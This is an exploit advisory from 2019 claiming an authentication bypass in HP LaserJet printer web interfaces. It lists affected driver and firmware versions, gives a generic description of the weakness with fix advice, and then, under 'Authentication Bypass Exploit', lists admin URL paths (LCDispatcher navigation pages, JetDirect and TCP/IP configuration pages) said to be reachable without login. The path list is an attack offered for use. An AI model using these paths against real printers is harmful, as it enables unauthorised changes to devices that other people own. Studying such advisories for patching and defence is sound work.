HP Color LaserJet Multiple Printers 6.7.0.x Auth Bypass

1. ############################################################################################
2.  
3. # Exploit Title : HP Color LaserJet Multiple Printers 6.7.0.x Authentication Bypass
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 23/05/2019
7. # Vendor Homepage : hp.com
8. # Software Information Link : support.hp.com/gb-en/drivers/
9. # Software Affected Versions :
10. Driver-Universal Print Driver for Managed Services => 6.7.0.x
11. Example Printer Model Numbers : CCXXXA
12. Driver-Product Installation Software => 61.091.12.102 and other versions
13. Driver-Universal Print Driver => Version 6.1.0.20062 and 6.7.0.23989 and other versions
14. Driver-USB => 7.0.0.29 and other versions
15. Firmware => 07.250.2 and other versions
16. Software Universal Printer Driver => Version 1.8.6 and other versions
17. Utility => Version 1.0 and other versions
18. # Tested On : Windows and Linux
19. # Category : WebApps
20. # Exploit Risk : High
21. # Vulnerability Type :
22. CWE-592 [ Authentication Bypass Issues ]
23. CWE-306 [ Missing Authentication for Critical Function ]
24. CWE-287 [ Improper Authentication ]
25. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
26. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
27. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
28.  
29. ############################################################################################
30.  
31. # Reference Links from PacketStormSecurity :
32. *****************************************
33. HP LaserJet P4014/P4015 Printers 6.7.0.x Bypass Missing Authentication
34.  
35. dl.packetstormsecurity.net/1904-exploits/hplj401467x-bypass.txt
36.  
37. HP LaserJet P3015 Printers 6.7.0.x Bypass Missing Authentication
38.  
39. dl.packetstormsecurity.net/1904-exploits/hplj3015670x-bypass.txt
40.  
41. HP LaserJet 5200 Printers 6.7.0.x Bypass Missing Authentication
42.  
43. dl.packetstormsecurity.net/1904-exploits/hplj5200670x-bypass.txt
44.  
45. HP Color LaserJet CP4025 Printers 6.7.0.x Bypass Missing Authentication
46.  
47. dl.packetstormsecurity.net/1904-exploits/hplj670x-bypass.txt
48.  
49. HP Color LaserJet CP4525 Printers 6.7.0.x Bypass Missing Authentication
50.  
51. dl.packetstormsecurity.net/1904-exploits/hplj4525670x-bypass.txt
52.  
53. ############################################################################################
54.  
55. # Description about Software :
56. ***************************
57. HP LaserJet as a brand name identifies the line of dry electrophotographic DEP laser printers
58. marketed by the American computer company Hewlett-Packard (HP).
59. The HP LaserJet was the world's first desktop laser printer.
60.  
61. ############################################################################################
62.  
63. # Impact :
64. ***********
65. The software does not perform any authentication for functionality that requires a provable user identity
66. or consumes a significant amount of resources.
67. The vulnerability allows a remote unauthenticated attacker to send specially crafted HTTP request to the
68. affected application and change configuration settings or gain administrative access.
69. Missing authentication for critical function is a language independent issue that can appear
70. in any multiuser environment.
71. Developing a fix would require understanding of the current application security model
72. and implemented access controls.
73. Three basic rules however can help you eliminate potential improper authorization issues:
74. 1) Identify all privileged assets within your application (web pages that display sensitive data,
75. website sections that contain privileged/administrative functionality, etc.)
76. 2) Identify user roles within the application and their access permissions
77. 3) Always check if the user should have privileges to access the asset
78. When an actor claims to have a given identity, the software does not prove
79. or insufficiently proves that the claim is correct.
80.  
81. ############################################################################################
82.  
83. # Authentication Bypass Exploit :
84. ******************************
85. /hp/device/this.LCDispatcher
86.  
87. /hp/device/this.LCDispatcher?nav=hp.EmailServer
88.  
89. /hp/device/this.LCDispatcher?nav=hp.Alerts&subpage=1&lstid=-1
90.  
91. /hp/device/this.LCDispatcher?nav=hp.Alerts&subpage=3&lstid=1
92.  
93. /hp/device/this.LCDispatcher?nav=hp.Alerts
94.  
95. /hp/device/this.LCDispatcher?nav=hp.AutoSend
96.  
97. /hp/device/this.LCDispatcher?nav=hp.Security&fldPage=0
98.  
99. /hp/device/this.LCDispatcher?nav=hp.OtherLinks
100.  
101. /hp/device/this.LCDispatcher?nav=hp.Config
102.  
103. /hp/device/this.LCDispatcher?nav=hp.DeviceInfoConfig
104.  
105. /hp/jetdirect
106.  
107. /config_pro.htm
108. /tcpipv6.htm
109. /tcpipv4.htm
110.  
111. /tcp_param.htm
112. /network_id.htm
113.  
114. /tcp_summary.htm
115. /index_info.htm
116.  
117. /support_param.html
118. /support.htm
119.  
120. /tcp_diag.htm
121. /configpage.htm
122.  
123. /tcp_param.htm
124. /network_id.htm
125.  
126. ############################################################################################
127.  
128. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
129.  
130. ############################################################################################